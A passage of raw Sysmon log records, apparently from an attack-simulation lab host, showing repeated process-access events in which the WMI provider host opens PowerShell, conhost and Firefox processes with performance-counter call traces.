Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150709Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-3FFA-60CA-FC06-00000000D101}5312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150708Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-3FFA-60CA-FC06-00000000D101}5312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150707Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-283A-60CA-2404-00000000D101}5252C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150706Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-283A-60CA-2404-00000000D101}5252C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150705Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F803-00000000D101}6872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150704Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F803-00000000D101}6872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150703Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F703-00000000D101}5228c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150702Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F703-00000000D101}5228c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150701Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F603-00000000D101}6736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150700Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F603-00000000D101}6736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150699Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F503-00000000D101}6688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150698Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F503-00000000D101}6688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150697Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-269B-60CA-EA03-00000000D101}6156C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150696Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-269B-60CA-EA03-00000000D101}6156C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150695Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E103-00000000D101}4292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150694Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 